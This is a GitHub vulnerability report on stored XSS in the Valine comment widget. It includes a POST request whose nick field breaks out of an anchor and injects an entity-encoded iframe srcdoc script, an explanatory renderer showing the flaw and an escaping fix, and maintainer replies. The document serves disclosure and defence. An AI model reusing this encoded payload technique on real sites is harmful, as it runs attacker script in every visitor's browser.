[vulnerability] Stored XSS via Nick field #348

Closed

SofFM opened this issue Nov 11, 2020 · 3 comments

SofFM commented Nov 11, 2020

If you want to report a bug, please provide the following information:

  • Description

    It is possible to embed arbitrary HTML/JavaScript in the comment (using the nick field), thus resulting in stored XSS (cross-site scripting).

  • The steps to reproduce:

    1. Change the request body for adding a comment as follows:
POST /1.1/classes/Comment HTTP/1.1
Host: XXX.api.lncld.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 640
Origin: https://xxx.yyy.zzz
{
    "comment": "Good! \n",
    "nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#99;&#111;&#110;&#115;&#111;&#108;&#101;&#46;&#108;&#111;&#103;&#40;&#39;&#83;&#116;&#111;&#114;&#101;&#100;&#32;&#88;&#83;&#83;&#32;&#116;&#101;&#115;&#116;&#32;&#112;&#97;&#115;&#115;&#101;&#100;&#39;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;\"",
    "mail": "",
    "link": "",
    "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",
    "url": "/en/prepare/prepare/",
    "QQAvatar": "",
    "ip": "1.2.3.4",
    "insertedAt": {
        "__type": "Date",
        "iso": "2020-11-04T08:30:47.526Z"
    },
    "ACL": {
        "*": {
            "read": true
        }
    }
}
    2. This malicious request adds a new comment. The HTML-encoded value of the srcdoc attribute in the request is:
    <script>console.log('Stored XSS test passed');</script>

    3. The injected JavaScript executes on the vulnerable web page for every visitor.

  • Which versions of Valine, and which browser / OS are affected by this issue?

    Valine: v1.4.14
    All systems and browsers
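The mechanics behind the report, as an added example (this is not Valine's code and not part of the issue): the comment is POSTed straight to the storage API (XXX.api.lncld.net in the request above), so nothing on the client side constrains what the `nick` field contains, and the only place the attack can be stopped is where the stored fields are turned into markup. The `srcdoc` value is HTML-entity encoded in the request, so the string `<script>` never appears literally in the stored nick; the browser decodes the entities when it parses the attribute. The snippet below shows a hypothetical renderer that concatenates fields into HTML (reproducing the breakout), the same renderer with context-appropriate escaping, and a decoder for the numeric entities in the payload. The template structure, the `safeHref` scheme allowlist and the function names are assumptions for illustration; the `SRCDOC` constant is copied verbatim from the request body in the report.

```javascript
// Added example, not Valine's code. Template, field handling and names are assumptions.

const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that matter in both text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPE_MAP[c]);
}

// Escaping alone does not stop a javascript: URL in href, so allowlist the scheme as well
// (hypothetical policy: only http(s) and mailto links are kept, anything else becomes "#").
function safeHref(link) {
  const trimmed = String(link).trim();
  return /^(https?:|mailto:)/i.test(trimmed) ? escapeHtml(trimmed) : '#';
}

// Hypothetical vulnerable renderer: untrusted fields concatenated straight into HTML.
// A nick of the form  Alex"</a><iframe ... srcdoc="..."  closes the anchor and starts an iframe.
function renderCommentVulnerable(c) {
  return `<div class="vcomment"><a class="vnick" href="${c.link}">${c.nick}</a>` +
         `<p class="vcontent">${c.comment}</p></div>`;
}

// Hardened renderer: same markup, every untrusted field escaped for the context it lands in.
function renderCommentSafe(c) {
  return `<div class="vcomment"><a class="vnick" href="${safeHref(c.link)}">${escapeHtml(c.nick)}</a>` +
         `<p class="vcontent">${escapeHtml(c.comment)}</p></div>`;
}

// Decode decimal (&#60;) and hex (&#x3c;) numeric character references the way the HTML
// parser does for an attribute value, so the srcdoc payload can be read in clear text.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);/gi, (_, ref) =>
    String.fromCodePoint(/^x/i.test(ref) ? parseInt(ref.slice(1), 16) : parseInt(ref, 10)));
}

// Constructed sample mirroring the report's request body (SRCDOC copied from the "nick" value;
// mail/ua/ip and the other fields are omitted because the renderer here does not use them).
const SRCDOC =
  '&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#99;&#111;&#110;&#115;&#111;&#108;&#101;&#46;' +
  '&#108;&#111;&#103;&#40;&#39;&#83;&#116;&#111;&#114;&#101;&#100;&#32;&#88;&#83;&#83;&#32;' +
  '&#116;&#101;&#115;&#116;&#32;&#112;&#97;&#115;&#115;&#101;&#100;&#39;&#41;&#59;' +
  '&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;';
const PAYLOAD_NICK = 'Alex"</a><iframe width=1 height=1 srcdoc="' + SRCDOC + '"';
const SAMPLE_COMMENT = { nick: PAYLOAD_NICK, link: '', comment: 'Good! \n' };

// Render the sample both ways and report whether an iframe start tag survived.
function demo() {
  const vulnerable = renderCommentVulnerable(SAMPLE_COMMENT);
  const safe = renderCommentSafe(SAMPLE_COMMENT);
  return {
    decodedSrcdoc: decodeNumericEntities(SRCDOC),
    vulnerableHasIframe: /<iframe\b/i.test(vulnerable),
    safeHasIframe: /<iframe\b/i.test(safe),
    vulnerable,
    safe,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running the block prints the decoded `srcdoc` (the `console.log` call from the report), the vulnerable markup with a live `<iframe>` in it, and the hardened markup where the same nick is rendered as visible text (`Alex&quot;&lt;/a&gt;&lt;iframe ...`). The point to carry back to any comment widget that stores to a backend-as-a-service: validate and escape at render time for the exact context (text node, attribute, URL), because the write path cannot be trusted to enforce anything.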

@xCss xCss added the bug label Nov 11, 2020
xCss (Owner) commented Nov 11, 2020

Received. This will be fixed in the next version, thanks for the feedback.

SofFM (Author) commented Dec 23, 2020

@xCss, Hi! I would like to point out that the official Valine website https://valine.js.org is also vulnerable to this stored XSS attack.

xCss (Owner) commented Oct 19, 2021

xCss closed this as completed Oct 19, 2021